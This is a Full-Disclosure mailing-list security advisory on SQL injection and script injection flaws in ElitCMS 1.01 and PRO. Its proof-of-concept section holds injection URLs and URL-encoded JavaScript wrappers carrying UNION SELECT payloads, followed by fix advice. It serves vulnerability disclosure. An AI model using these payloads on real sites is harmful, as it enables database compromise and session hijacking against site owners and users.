[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities
From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
Date: Fri, 18 Oct 2013 02:33:48 +0200
Document Title:
===============
Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1117


Release Date:
=============
2013-10-18


Vulnerability Laboratory ID (VL-ID):
====================================
1117


Common Vulnerability Scoring System:
====================================
8.3


Product & Service Introduction:
===============================
Elite CMS is a web content management system made for the peoples who don`t 
have much technical knowledge of HTML or 
PHP but know how to use a simple notepad with computer keyboard. Elite CMS Pro 
is a successor of the eliteCMS . 

Elite CMS was made available free to public last year i.e. 2008. Since then i 
have received hundreds of appreciation 
email from the users of eliteCMS world wide. Some user of my eliteCMS want some 
more robust and powerful features. 
Due to the huge response from the users i have decided to write pro edition of 
eliteCMS.

All new features in pro edition of the eliteCMS is based on the feedbacks and 
suggestions made by users of eliteCMS 
- The Lightweight CMS. Some users suggested that eliteCMS should have 
multilevel menu navigation with sub pages support, 
some suggested multiple web forms support for cms pages, some want more 
flexible and easy to understand template system.

(Copy of the Homepage: http://elitecms.net/elitecmspro.php )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities 
in the Elite-Graphix `ElitCMS` v1.01 web-application.


Vulnerability Disclosure Timeline:
==================================
2013-10-18:    Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Elite Graphix
Product: ElitCMS - Web Application 1.01


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
1.1
A remote sql injection web vulnerability is detected in the official 
Elite-Graphix `ElitCMS` v1.01 web-application.
The vulnerability allows remote attackers to unauthorized inject own sql 
commands to compromise the application dbms.

The vulnerability is located in the `page` value of the index.php file. Remote 
attackers are able to inject own sql 
commands in the page parameter GET method request to compromise the database 
management system or web-application.
The issue is a classic order by sql injection vulnerability.  

Exploitation of the sql injection web vulnerability requires no user 
interaction or privileged application user account.
Successful exploitation of the sql injection bug results in database management 
system and web-application compromise.


Vulnerable Module(s):
                                [+] Index

Vulnerable File(s):
                                [+] index.php

Vulnerable Parameter(s):
                                [+] page



1.2
A client-side post inject web vulnerability is detected in the official Elite 
Graphix ElitCMS v1.01 web-application.
The vulnerability allows remote attackers to manipulate via POST method 
web-application to browser requests (client-side).

The vulnerability is located in the contact form module of the application in 
the name value parameter. Remote attackers 
can inject own malicious persistent script codes as name value in the contact 
form when processing to send via POST method.
The script code execute occurs in the thanks page in the context of the echo 
name value.

Successful exploitation of the client-side POST inject web vulnerability 
results in session hijacking, client-side phishing, 
client-side unauthorized external redirects and client-side manipulation of the 
contact formular module context.


Vulnerable Module(s):
                                [+] Contact Formular

Vulnerable File(s):
                                [+] page

Vulnerable Parameter(s):
                                [+] name


Proof of Concept (PoC):
=======================
1.1
The sql injection web vulnerability can be exploited by remote attackers 
without privileged application user account 
and also without user interaction. For demonstration or to reproduce ...

PoC: #1 - Standard Edition
http://elit.localhost:8080/elitecms/index.php?page=-1%27[ORDER BY SQL INJECTION 
VULNERABILITY!]--


Exploit: 

<script 
language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EElit%20CMS%20v1.01%20-
%20SQL%20Injection%20PoC#1-StandardEdition%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//cms.localhost%3A8080/elitecms/index.php%3F
page%3D3%27union%20select%20all%201%2C2%2Cx%2Cx%2Cx%2Cx%2C--%20%20width%3D%22733%22%20height%3D%22733%22%3E%0A%3C/
body%3E%3C/head%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>


--- DBMS SQL Exception Logs ---
Database Query failed !
Check Database Settings.
You have an error in your SQL syntax; 
Check the manual that corresponds to your MySQL server version for the right 
syntax to use near ''-1''' at line 1


PoC: #2 - PRO Edition
http://elit.localhost:8080/index.php?mpage=3&subpage=-1%27[ORDER BY SQL 
INJECTION VULNERABILITY!]--

<script 
language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EElitCMS%20v1.01%20-
%20SQL%20Injection%20PoC%232%20PRO%20Edition%3C/title%3E%0A%3Ciframe%20src
%3Dhttp%3A//elit.localhost%3A8080/index.php%3Fmpage%3D3%26subpage%3D-7%27union%20select%201%2C2%2C3
%2Cx%2Cx%2Cx%2Cx%2C@@version%2Cx--%3E%0A%3C/body%3E%3C/head%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>


--- DBMS SQL Exception Logs ---
Database Query failed !
Check Database Settings.
You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right 
syntax to use near '-'''' at line 1



1.2
The client-side post inject web vulnerability can be exploited by remote 
attackers without privileged application user account 
and with low or medium user interaction. For demonstration or reproduce ...


PoC: Thanks - (Page echo with vulnerable Name value)

<div id="content">
<h1>Contact Information</h1>
<p id="eq3">Feel free to contact us with your feedbacks .<br><br>Use contact 
form below to send us quick email.<br></p>
<div class="ctFrmHd">-: Contact Form :-</div>
<span class="successMsg">Thank you dear <span>>"<<"<><>"<[CLIENT-SIDE INJECTED 
SCRIPT CODE VIA POST!]"></span> 
your message has been send successfully.</span><form name="contactForm" 
method="post" action="">
<table width="419" border="0" cellpadding="8" cellspacing="0" 
id="contcatFormTbl">
<tr>
<td width="88">     Name :</td>
<td width="304"><input type="text" name="name" id="name"  class="frmInput" 
value=">"<[CLIENT-SIDE INJECTED SCRIPT CODE VIA POST!]>"/></td>
</tr>


Note: As default the page=3 is available as contact formular but it can also be 
located in other module of the elit-cms.


Reference(s):
http://elit.localhost:8080/elitecms/index.php?page=3


Solution - Fix & Patch:
=======================
1.1
The sql injection web vulnerability can be patched by the implement of a secure 
statement to the page value and index.php file.
Also restrict the page value request and ensure the output is secure encoded.
Disallow the display of sql debug/errors logs in the cms main context. Setup a 
own module to log sql errors in the acp.

1.2
The client-side post inject web vulnerability can be patched by a secure parse 
and encode of the name value in the post method request 
and the thanks page echo message. 


Security Risk:
==============
1.1
The security risk of the sql injection web vulnerability is estimated as 
critical.

1.2
The security risk of the client-side post inject web vulnerability is estimated 
as low(+)|(-)medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
               - www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx         - 
research@xxxxxxxxxxxxxxxxxxxxx               - admin@xxxxxxxxxxxxxxxxx
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com    
               - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
               - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or 
research@xxxxxxxxxxxxxxxxxxxxx) to get a permission.

                                Copyright © 2013 | Vulnerability Laboratory 
[Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Prev by Date: [Full-disclosure] [ISecAuditors Security Advisories] CSRF vulnerability in LinkedIn
Next by Date: [Full-disclosure] NEW VMSA-2013-0012 VMware vSphere updates address multiple vulnerabilities
Previous by thread: [Full-disclosure] [ISecAuditors Security Advisories] CSRF vulnerability in LinkedIn
Next by thread: [Full-disclosure] NEW VMSA-2013-0012 VMware vSphere updates address multiple vulnerabilities
Index(es):
- Date
- Thread